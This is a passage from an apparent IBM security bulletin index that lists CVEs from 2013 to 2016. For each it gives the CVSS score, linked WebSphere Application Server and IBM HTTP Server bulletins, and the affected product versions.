affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-5986 | 3.7 | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg21990056>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5983 | 7.5 | [Gain Privileges](<http://www-01.ibm.com/support/docview.wss?uid=swg21990060>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5597 | 5.9 | [IBM Java SDK for October 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21993440>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5573 | 8.3 | [IBM Java SDK for October 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21993440>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5549 | 6.5 | [IBM Java SDK for January 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21998379>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5548 | 6.5 | [IBM Java SDK for January 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21998379>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5547 | 5.3 | [IBM Java SDK for January 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21998379>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5546 | 7.5 | [IBM Java SDK for January 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21998379>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \nHTTPOXY | CVE-2016-5387 | 8.1 | Not affected | [Redirect HTTP traffic](<http://www-01.ibm.com/support/docview.wss?uid=swg21988019>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-4975 | 6.1 | Not affected | Superseded by CVE-2016-8743 | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-4472 | 5.3 | Not affected | [Denial of Service with Expat](<http://www-01.ibm.com/support/docview.wss?uid=swg21988026>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-3485 | 2.9 | [IBM Java SDK for July 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21988339>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-3427 | 10 | [IBM Java SDK for April 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-3426 | 4.3 | [IBM Java SDK for April 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-3092 | 5.3 | [Apache Commons FileUpload Vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21987864>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-3042 | 5.4 | [Cross-site scripting vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21986716>) | Not affected | Liberty \n| CVE-2016-3040 | 6.3 | [Open Redirect Vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21986715>) | Not affected | Liberty \n| CVE-2016-2960 | 3.7 | [Denial of Service with SIP Services](<http://www-01.ibm.com/support/docview.wss?uid=swg21984796>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-2945 | 5.0 | [Weaker security in Liberty API discovery feature](<http://www-01.ibm.com/support/docview.wss?uid=swg21984502>) | Not affected | Liberty \n| CVE-2016-2923 | 5.3 | [Information Disclosure vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21983700>) | Not affected | Liberty \nSWEET32 | CVE-2016-2183 | 3.7 | [IBM Java SDK for January 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21998379>) | [IBM HTTP Server and Sweet32](<http://www-01.ibm.com/support/docview.wss?uid=swg21991548>) (21 Dec 2017) | 9.0 8.5, 8.0, 7.0, Liberty \n| CVE-2016-1182 \n \nCVE-2016-1182 | 4.8 \n \n4.8 | [Bypass Security Restrictions](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) \n[Bypass Security Restrictions UDDI](<http://www-01.ibm.com/support/docview.wss?uid=swg22016214>) (21 June 2018) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-1181 \n \nCVE-2016-1181 | 8.1 \n \n8.1 | [Execute Code](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) \n \n[Execute Code UDDI](<http://www-01.ibm.com/support/docview.wss?uid=swg22016214>) (21 June 2018) | Not affected \n \nNot affected | 9.0, 8.5, 8.0, 7.0 \n9.0, 8.5. 8.0, 7.0 \nDROWN | CVE-2016-0800 | | [Not affected bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21978292>) | [Not affected bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21978317>) | \n| CVE-2016-0718 | 9.8 | Not affected | [Denial of Service with Expat](<http://www-01.ibm.com/support/docview.wss?uid=swg21988026>) (13 Sept 2016) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-0702 | 2.9 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0 \n| CVE-2016-0488 | 4.0 | [IBM Java SDK for January 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21975424>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-0475 | 5.8 | [IBM Java SDK for January 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21975424>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-0466 | 5.0 | [IBM Java SDK for January 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21975424>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-0389 | 5.3 | [Information Disclosure Vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21982012>) | Not affected | Liberty \n| CVE-2016-0385 | 3.1 | [Bypass security restrictions](<http://www-01.ibm.com/support/docview.wss?uid=swg21982588>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-0378 | 3.7 | [Information Disclosure Vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21981529>) | Not affected | Liberty \n| CVE-2016-0377 | 4.3 | [Information Disclosure vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21980645>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2016-0360 | 8.1 | [Deserialize objects with MQ Resource adapter](<http://www-01.ibm.com/support/docview.wss?uid=swg21996748>) 14.03.2017 | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-0359 | 6.1 | [HTTP Response Splitting](<http://www-01.ibm.com/support/docview.wss?uid=swg21982526>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-0306 | 3.7 | [Security vulnerability if FIPS 140-2 is enabled](<http://www-01.ibm.com/support/docview.wss?uid=swg21979231>) | Not affected | 8.5, 8.0,7.0, Liberty \n| CVE-2016-0283 | 6.1 | [Cross-site scripting vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21978293>) | Not affected | Liberty \n| CVE-2016-0201 | 5.9 | Not affected | [Vulnerability in GSKit component](<http://www-01.ibm.com/support/docview.wss?uid=swg21974507>) | 8.5, 8.0, 7.0 \n \n**2015 CVEs**\n\n**Name**\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \nSLOTH | CVE-2015-7575 | 7.1 | [IBM Java SDK for January 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21975424>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2015-7450 | 9.8 | \n\n[Vulnerability in Apache Commons affects IBM WebSphere Application Server](<https://www-01.ibm.com/support/docview.wss?uid=swg21970575>) (21 Dec 2017)\n\n[Knowledge Center updates ](<https://www.ibm.com/support/pages/node/1107105>) (14 Nov 2019)\n\n| Not affected | \n\n8.5, 8.0, 7.0, Liberty\n\n9.0 \n \n| CVE-2015-7420 | 3.7 | Not affected | [Vulnerability in GSKit component](<http://www-01.ibm.com/support/docview.wss?uid=swg21974507>) | 8.5, 8.0, 7.0 \n| CVE-2015-7417 | 5.4 | [Cross-site scripting with OAuth](<http://www-01.ibm.com/support/docview.wss?uid=swg21974520>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2015-5262 | 5.3 | [Denial of Service](<https://www.ibm.com/support/pages/node/6453091>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2015-5006 | 4.6 | [IBM Java SDK for October 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21969620>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-4947 | 7.5 | Not affected | [Stack buffer overflow](<http://www-01.ibm.com/support/docview.wss?uid=swg21965419>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-4938 | 3.5 | [Spoof servlet vulnerabilities](<http://www-01.ibm.com/support/docview.wss?uid=swg21963275>) | | 8.5, 8.0, 7.0, Liberty \n| CVE-2015-4872 | 5.0 | [IBM Java SDK for October 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21969620>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-4749 | 4.3 | [IBM Java SDK for July 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21962931>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-4734 | 5.0 | [IBM Java SDK for October 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21969620>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \nLog Jam | CVE-2015-4000 | 4.3 | [Logjam with Diffie-Hellman ciphers](<http://www-01.ibm.com/support/docview.wss?uid=swg21957980>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-3183 | 6.1 | Not affected | [HTTP Request smuggling](<http://www-01.ibm.com/support/docview.wss?uid=swg21963361>) | 8.5, 8.0, 7.0, 6.1 \nBar Mitzvah | CVE-2015-2808 | 5.0 | [Vulnerability in RC4 stream cipher affects WebSphere Application Server](<https://www-01.ibm.com/support/docview.wss?uid=swg21701503>) | [Vulnerability in RC4 stream cipher affects IBM HTTP Server and Caching Proxy](<https://www-01.ibm.com/support/docview.wss?uid=swg21701072>) | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-2625 | 2.6 | [IBM Java SDK for July 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21962931>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-2613 | 5.0 | [IBM Java SDK for July 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21962931>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-2601 | 5.0 | [IBM Java SDK for July 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21962931>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-2017 | 5.0 | [HTTP response splitting attack](<http://www-01.ibm.com/support/docview.wss?uid=swg21966837>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-1946 | 4.1 | [Gain elevated privileges](<http://www-01.ibm.com/support/docview.wss?uid=swg21959083>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2015-1936 | 4 | [Hijack users session vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21959083>) | Not affected | 8.5, 8.0 \n| CVE-2015-1932 | 5 | [Information Disclosure vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21963275>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2015-1931 | 2.1 | [IBM Java SDK for July 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21962931>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-1927 | 6.8 | [Gain elevated privileges vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21959083>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2015-1920 | 9.3 | [Security vulnerability with management port in WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21883573>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-1916 | 5.0 | [IBM Java SDK for April 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21902260>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-1885 | 9.3 | [Gain elevated privileges with OAuth grant password](<http://www-01.ibm.com/support/docview.wss?uid=swg21697368>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2015-1882 | 8.5 | [Gain elevated privileges with EJB](<http://www-01.ibm.com/support/docview.wss?uid=swg21697368>) | Not affected | Liberty \n| CVE-2015-1829 | 5.0 | Not affected | [Denial of Service on Windows with IBM HTTP Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21959081>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-1788 | 5.0 | Not affected | [Denial of Service in GSKIT with IBM HTTP Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21963362>) | 8.5, 8.0 \n| CVE-2015-1283 | 6.8 | Not affected | [Denial of Service with IBM HTTP Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21964428>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-0899 | 4.3 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg22015348>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2015-0488 | 5.0 | [IBM Java SDK for April 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21902260>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-0478 | 4.3 | [IBM Java SDK for April 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21902260>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-0410 | 5.0 | [IBM Java SDK for January 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21695362>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-0400 | 5.0 | [IBM Java SDK for January 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21695362>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-0254 | 7.5 | [Security vulnerability in Apache Standard Taglibs](<http://www-01.ibm.com/support/docview.wss?uid=swg21978495>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-0250 | 4.3 | [Security vulnerability in Apache Batik](<http://www-01.ibm.com/support/docview.wss?uid=swg21959083>) | Not affected | 8.5, 8.0, 7.0, 6.1 \nGhost | CVE-2015-0235 | | Not affected | Not affected | \n| CVE-2015-0226 | 5.0 | [Security vulnerability in Apache WSS4J](<http://www-01.ibm.com/support/docview.wss?uid=swg21959083>) | Not affected | 8.5 \n| CVE-2015-0204 | 4.3 | [IBM Java SDK for April 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21902260>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-0174 | 3.5 | [Information disclosure with SNMP](<http://www-01.ibm.com/support/docview.wss?uid=swg21697368>) | Not affected | 8.5 \n| CVE-2015-0175 | 4.0 | [Gain elevated privileges with authData elements](<http://www-01.ibm.com/support/docview.wss?uid=swg21697368>) | Not affected | Liberty \nFREAK | CVE-2015-0138 | 4.3 | [Vulnerability with RSA export Keys affects WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21698613>) | [Vulnerability with RSA export keys affects IBM HTTP Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21698959>) | 8.5, 8.0, 7.0, 6.1, Liberty \n \n**2014 CVEs**\n\n**Name**\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2014-8917 | 4.3 | [Cross-site Scripting in Dojo Toolkit](<http://www-01.ibm.com/support/docview.wss?uid=swg21697284>) | Not affected | 8.5, 8.0 \n| CVE-2014-8890 | 5.1 | [Elevated Privileges in Liberty](<http://www-01.ibm.com/support/docview.wss?uid=swg21690185>) | Not affected | Liberty \nTLS Padding | CVE-2014-8730 | 4.3 | [Not affected bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21692484>) | [TLS Padding in IBM HTTP Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21692502>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-7810 | 5.0 | [Bypass security](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729557>) | [Bypass security](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729557>) | 9.0, 8.5, 8.0, 7.0, Liberty \nShell shock | CVE-2014-7189 \nCVE-2014-7186 \nCVE-2014-7169 \nCVE-2014-6278 \nCVE-2014-6277 \nCVE-2014-6271 | | [Bash Vulnerabilities](<http://www-01.ibm.com/support/docview.wss?uid=swg21685433>) \n \nNot affected but applications could be | [Bash Vulnerabilities](<http://www-01.ibm.com/support/docview.wss?uid=swg21685433>) \n \nNot affected but applications could be | Customer application might be vulnerable \n| CVE-2014-6593 | 4.0 | [IBM Java SDK for January 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21695362>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-6558 | 2.6 | [IBM Java SDK for October 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21687740>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-6512 | 4.3 | [IBM Java SDK for October 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21687740>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-6457 | 4.0 | [IBM Java SDK for October 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21687740>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-6174 | 4.3 | [Click jacking vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21690185>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2014-6167 | | [Cross-site scripting](<https://www-304.ibm.com/support/docview.wss?uid=swg21682767>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2014-6166 | 5.0 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21690185>) | Not affected | 8.5, 8.0 \n| CVE-2014-6164 | 4.3 | [Spoofing vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21690185>) | Not affected | 8.5 \n| CVE-2014-4816 | 3.5 | Not affected | [Cross-site scripting vulnerability](<https://www-304.ibm.com/support/docview.wss?uid=swg21682767>) | 8.5, 8.0, 7.0, 6.1, 6.0 \n| CVE-2014-4770 | 3.5 | Not affected | [Cross-site request forgery](<https://www-304.ibm.com/support/docview.wss?uid=swg21682767>) | 8.5, 8.0, 7.0, 6.1, 6.0 \n| CVE-2014-4767 | 4.3 | [Weaker than expected security](<http://www-01.ibm.com/support/docview.wss?uid=swg21681249>) | Not affected | Liberty \n| CVE-2014-4764 | 7.1 | [Denial of service](<http://www-01.ibm.com/support/docview.wss?uid=swg21681249>) | Not affected | 8.5, 8.0 \n| CVE-2014-4263 | 4.0 | [IBM Java SDK for July 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21680418>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-4244 | 4.0 | [IBM Java SDK for July 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21680418>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-3603 | 6.5 | [Spoofing](<https://www.ibm.com/support/pages/node/964764>) | Not affected | Liberty \n| CVE-2014-3577 | 4.3 | [Spoofing Vulnerability](<https://www.ibm.com/support/pages/node/6453091>) | Not affected | 9.0, 8.5, 8.0 \nPOODLE | CVE-2014-3566 | 4.3 | [IBM Java SDK for October 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21687740>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-3083 | 5.0 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21681249>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2014-3070 | 5.0 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21676222>) | Not affected | 8.5, 8.0 \n| CVE-2014-3068 | 2.4 | [IBM Java SDK for July 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21680418>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-3022 | 5.0 | [Bypass security](<https://www-304.ibm.com/support/docview.wss?uid=swg21676222>) | Not affected | 8.5, 8.0 \n| CVE-2014-3021 | 5.0 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21690185>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2014-0965 | 4.3 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21681249>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2014-0964 | 7.1 | [Denial of service](<http://www-01.ibm.com/support/docview.wss?uid=swg21671835>) | Not affected | 6.1 \n| CVE-2014-0963 | 7.1 | Not affected | [CPU exhaustion](<https://www-304.ibm.com/support/docview.wss?uid=swg21672843>) | 8.5, 8.0, 7.0, 6.1, 6.0 \n| CVE-2014-0896 | 4.3 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | Not affected | Liberty \n| CVE-2014-0891 | 5.0 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2014-0878 | 5.8 | [IBM Java SDK for April 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21673013>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-0859 | 5.0 | [Denial of service](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2014-0857 | 4.0 | [Obtain Information](<http://www-01.ibm.com/support/docview.wss?uid=swg21671835>) | Not affected | 8.5, 8.0 \n| CVE-2014-0823 | 4.3 | [View Files](<http://www-01.ibm.com/support/docview.wss?uid=swg21671835>) | Not affected | 8.5, 8.0, Liberty \n| CVE-2014-0460 | 5.8 | [IBM Java SDK for April 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21673013>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-0453 | 4.0 | [IBM Java SDK for April 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21673013>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-0411 | 4.0 | [IBM Java SDK for January 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21663938>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-0231 | 5.0 | Not affected | [Denial of Service](<https://www-304.ibm.com/support/docview.wss?uid=swg21672428>) | 8.5, 8.0, 7.0, 6.1, 6.0 \n| CVE-2014-0226 | 7.5 | Not affected | [Heap buffer overflow](<https://www-304.ibm.com/support/docview.wss?uid=swg21672428>) | 8.5, 8.0, 7.0, 6.1, 6.0 \nHeartbleed | CVE-2014-0160 | | [Not affected Bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21669774>) | [Not affected Bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21669774>) | \n| CVE-2014-0118 | 5.0 | Not affected | [Denial of Service](<https://www-304.ibm.com/support/docview.wss?uid=swg21672428>) | 8.5, 8.0, 7.0, 6.1, 6.0 \n| CVE-2014-0114 \nCVE-2014-0114 | 7.5 \n7.5 | [Execute code](<http://www-01.ibm.com/support/docview.wss?uid=swg21672316>) \n[Execute code UDDI](<http://www-01.ibm.com/support/docview.wss?uid=swg22016214>) (21 June 2018) | Not affected | 7.0, 6.1 \n9.0, 8.5, 8.0, 7.0 \n| CVE-2014-0098 | 5.0 | Not affected | [Denial of service](<https://www-304.ibm.com/support/docview.wss?uid=swg21667526>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-0076 | 2.1 | Not affected | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg21681249>) | 8.5, 8.0 \n| CVE-2014-0050 | 5.0 | [Denial of service](<http://www-01.ibm.com/support/docview.wss?uid=swg21667254>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n \n**2013 CVEs**\n\n**Name**\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2013-6747 | 7.1 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | 8.5, 8.0, 7.0 \n| CVE-2013-6738 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2013-6725 | 3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21661323>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2013-6440 | 4.3 | [XML External Entity](<http://www-01.ibm.com/support/docview.wss?uid=swg22010415>) | Not affected | Liberty \n| CVE-2013-6438 | 4.3 | Not affected | [Buffer overflow](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | 8.5, 8.0, 7.0 \n| CVE-2013-6330 | 2.1 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21661323>) | Not affected | 7.0 \n| CVE-2013-6329 | 7.8 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21659548>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-6325 | 4.3 | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21661323>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2013-6323 | 3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2013-5802 | 2.6 | [IBM Java SDK for Oct 2013 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21655990>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-5780 | 4.3 | [IBM Java SDK for Oct 2013 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21655990>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-5704 | 5 | Not affected | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21672428>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-5425 | 3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5 \n| CVE-2013-5418 | 3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2013-5417 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5, 8.0, 7.0 Liberty \n| CVE-2013-5414 | 3.5 | [Privilege escalation](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2013-5372 | 4.3 | [IBM Java SDK for Oct 2013 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21655990>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-4053 | 6.8 | [Privilege escalation](<http://www-01.ibm.com/support/docview.wss?uid=swg21647522>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-4052 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21647522>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-4039 | 4 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21647485>) | Not affected | 8.5 \n| CVE-2013-4006 | 3.5 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | Liberty \n| CVE-2013-4005 | 3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21644047>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-4004 | 3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21644047>) | Not affected | 8.5, 8.0 \n| CVE-2013-3029 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21640799>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-3024 | 6.9 | [Execute code](<http://www-01.ibm.com/support/docview.wss?uid=swg21639553>) | Not affected | 8.5 \n| CVE-2013-2976 | 1.9 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21639553>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-2967 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21639553>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-1896 | 4.3 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21643362>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-1862 